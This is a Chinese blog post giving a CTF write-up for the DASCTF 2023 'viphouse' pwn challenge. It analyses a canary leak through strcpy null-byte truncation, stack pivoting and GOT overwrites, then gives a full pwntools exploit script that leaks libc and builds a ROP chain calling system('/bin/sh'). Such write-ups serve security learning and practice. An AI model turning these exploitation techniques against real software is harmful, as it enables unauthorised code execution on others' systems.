DASCTF 2023 & 0X401七月暑期挑战赛【PWN】(VIPhouse篇)

于 2024-07-24 17:11:06 发布
阅读量361 收藏 1
点赞数 14
文章标签: 安全威胁分析 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/susu_xiaosu/article/details/140668151
版权

DASCTF 2023 & 0X401七月暑期挑战赛【PWN】(VIPhouse篇)

题目保护情况

没有开pie保护,延迟绑定机制

64位ida逆向

给了一些功能函数

1.login in

输入密码的时候会溢出,同时判断输入的name,和passwd

同时有两个标志位,如果是admin,多一个标志位

2.canary功能

前提是admin才能进行输出canary,而且要输入正常随机数

3.UAF功能

add功能可以向ptr写入8字节数据

思路:1.有溢出可能是要想办法绕过canary,但是只有输入正确的随机数才能获得canary,但是是通过strcpy进行赋值的,存在00截断,如果随机数的低位是00,那么随机数就是8*\x00所以我们可以通过这个来进行尝试,也就是输入8*\x00的随机数,获取canary。

2.有了canary,想办法泄露libc地址,但是程序没有可以利用的gadget,那就看看别的部分

注意到泄露canary的时候printf的第一个参数可以通过rbp来控制,即rbp-0xe的位置

但是又一个问题,直接通过printf来泄露地址话,会抬高rsp,导致程序写入不可写的地址导致程序崩溃,这里的解决办法是通过,ptr地址将printf的got表写入puts的plt表,同时还有一个问题,在最后栈迁移得到shell的时候,canary的位置不可控导致最后检查的时候触发__stack_chk_fail,也会导致程序崩溃,那么就继续修改__stack_chk_fail——got表为pop_rbp,为什么选这个,pop_rbp不会对栈上的数据进行破坏,而且可以恢复栈。最后再次栈迁移,获取shell。

exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

io = process('./viphouse')
elf =ELF('./viphouse')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def login(name,passwd):
    io.sendlineafter('option:','1')
    io.sendlineafter('username:',name)
    io.sendlineafter('password:',passwd)



def uaf():
    io.sendlineafter('option:','3')


def add(msg):
    io.sendlineafter('Choice: ','1')
    io.sendlineafter('Enter your note:',msg)

def free():
    io.sendlineafter('Choice: ','2')


def canary(num):
    io.sendlineafter('option:','4')
    io.sendlineafter('Please input the number you guess: ',num)



login('admin\0','root\0')
gdb.attach(io)
canary(b'\x00'*8)
io.recvuntil('gift!')

canary = int(io.recvline(),16)
success('canary----->'+hex(canary))
#gdb.attach(io)
#pause()
ptr = 0x404128
add_ptr = 0x4017F2
bss = 0x404f00
ret_addr = 0x401991
pop_rbp =  0x40139d
lv = 0x40147b
io.sendlineafter('option:','5')
io.sendlineafter('option:','1')
io.sendlineafter('username:',b'admin\x00')
payload = b'a'*0x40 + flat(canary, ptr + 0x2a0, ret_addr)
io.sendlineafter('password:',payload)

io.sendlineafter('username:',p64(elf.got['printf']))
payload = b'a'*0x40 + flat(canary, ptr+0x2a0+0x10, add_ptr, bss, ret_addr)
io.sendafter('password:',payload)
io.send(p64(elf.plt['puts']))

io.sendlineafter('username:',b'admin\x00')
payload = b'a'*0x40 + flat(canary, ptr + 0x2a0, ret_addr)
io.sendlineafter('password:',payload)

io.sendlineafter('username:',p64(elf.got['__stack_chk_fail']))
payload = b'a'*0x40 + flat(canary, ptr+0x2a0+0x10, add_ptr, bss, ret_addr)
io.sendafter('password:',payload)     
io.send(p64(pop_rbp))
gdb.attach(io)
io.sendlineafter('username:',flat(elf.got['read']+0xe,0x4015D0,elf.sym['login']))
payload = b'a'*0x40 + flat(canary, 0x404c60,lv)
io.sendlineafter('password:',payload)
io.recvuntil('\n')
libc_base = u64(io.recv(6).ljust(8,b'\x00')) - libc.sym['read']
success('libc_base----->'+hex(libc_base))

pop_rdi = next(libc.search(asm('pop rdi;ret'))) + libc_base
bin_sh = next(libc.search(b'/bin/sh\0')) + libc_base
system = libc.sym['system'] + libc_base
ret = pop_rdi+1

io.sendlineafter('username:',flat(0,ret,pop_rdi,bin_sh,system))
payload = b'a'*0x40 + flat(canary,0x4049d0,lv)
io.sendlineafter('password:',payload)



io.interactive()

ps:这里打的本地就没有用循环了,注意ptr+0x2a0是因为会把rbp-0x2a0的数据写入ptr。ptr+0x2a0+0x10是为了布置新的rbp返回正确的地址上。

最后的0x404c60,等都是要通过调试到程序里面找,然后进行迁移。

susu_xiaosu
关注
  • 14
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DASCTF 2023 & 0X401七月暑期挑战赛 Reverse部分题解
OrientalGlass的博客
07-23 725
这里的input定义为QWORD[24] 实际上前4个单元(4*8=32字节)没有被使用,后20个QWORD在循环时强转成DWORD(即40个单元),所以input是个4行10列矩阵,并且每行10个DWORD(实际有效内容仅1Byte)第一个循环是进行矩阵乘法并修改data,第二个大循环是检查data是否为零矩阵,也就是说经过第一个大循环运算后data应该全0。主函数发现不了什么,于是在函数列表逐个探查函数,最终找到一个可疑函数有赋值和矩阵乘法。注意这里是从data[10+i]开始。动态调试观察执行情况。
DASCTF 2023 & 0X401七月暑期挑战赛-Crypto复现
Emmaaaaa's blog
07-24 941
关键词:光滑数,Franklin-Reiter相关消息攻击,copper求t,groebner_basis() 之前做过相关消息攻击的题,但都是那种一眼就能看出来的,这次遇到两道不寻常的,值得记录,求解方法也更加多元化了哈哈,只能说还有待提高,继续加油吧!
[DASCTF 2023 & 0X401七月暑期挑战赛] viphouse复现
weixin_52640415的博客
07-26 928
strcpy漏洞
DASCTF 2023 & 0X401七月暑期挑战赛 Re
weixin_51890658的博客
07-28 151
最后出现了加密数据对比,在ida0x401290中,所有的加密算法都找出来了,加密数据也有,然后逆回去及可。简单的分析了下,发现输入flag,flag的每个数据异或0x401,通过逆回去发现完全不对,想多了。先对flag的每个字符异或0x401,然后每个数据+i*i(0-39)通过它的题目提示,发现程序流有异常,动态调试,发现出了整个执行流程。接着下标在10-29的数据进行异或i*(i+1)接着下标在10-29的数据1:1的进行了交换。再接着就是每个数据-i(0-39)
DASCTF 2023 & 0X401七月暑期挑战赛PWN】(FileEditor
最新发布
susu_xiaosu的博客
07-24 170
【代码】DASCTF 2023 & 0X401七月暑期挑战赛PWN】(FileEditor
DASCTF 2024暑期挑战赛|为热爱,并肩作战
weixin_52640415的博客
07-21 915
现在这密码全是格了,这格怎么个格法?
大怨种的pwn的wp
XDiku的博客
07-08 267
ia()
面试总结-2023安全面试题总汇
lza20001103的博客
09-16 6617
2023安全面试题总汇 文章目录2023安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
CTF竞赛权威指南(Pwn) 相关资源(python).zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn) 相关资源(python).zip
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
ctf比赛中收集的pwn,并制作write-up。.zip
09-30
比赛项目源码
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
强敌环伺:金融业信息安全威胁分析——整体态势
AKAMAI_CHINA的博客
01-29 1087
在Web应用程序和API攻击、零日漏洞以及DDoS攻击等方面,金融服务业一直是最主要的三大被攻击目标垂直行业之一。金融服务业的Web应用程序和API攻击数量同比激增3.5倍,在所有主要行业中增速最快。如何阻止Web应用程序和API攻击利用新发现的零日漏洞针对金融服务业发起的攻击,在24小时内就可以轻松达到每小时数千次的规模,并且会快速达到峰值,这使得防御者几乎没时间打补丁或做出反应。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 527
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 669
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1143
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
自媒体创作、小说推文等网赚项目安全吗?网络兼职需要注意什么?
2401_86131344的博客
07-23 216
综上所述,自媒体创作和小说推文等网赚项目在遵守相关规定和采取正确操作方式的前提下是安全的。- 在自媒体创作和小说推文的过程中,要严格遵守平台的相关规定和规则,避免违规行为导致账号被封禁或收益被扣除。自媒体创作和小说推文等网赚项目本身**可以**是安全的,但前提是要采取正确的操作方式和遵守相关规定。- 对于小说推文,要选择正规的小说平台进行合作,例如知乎、起点、飞卢等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值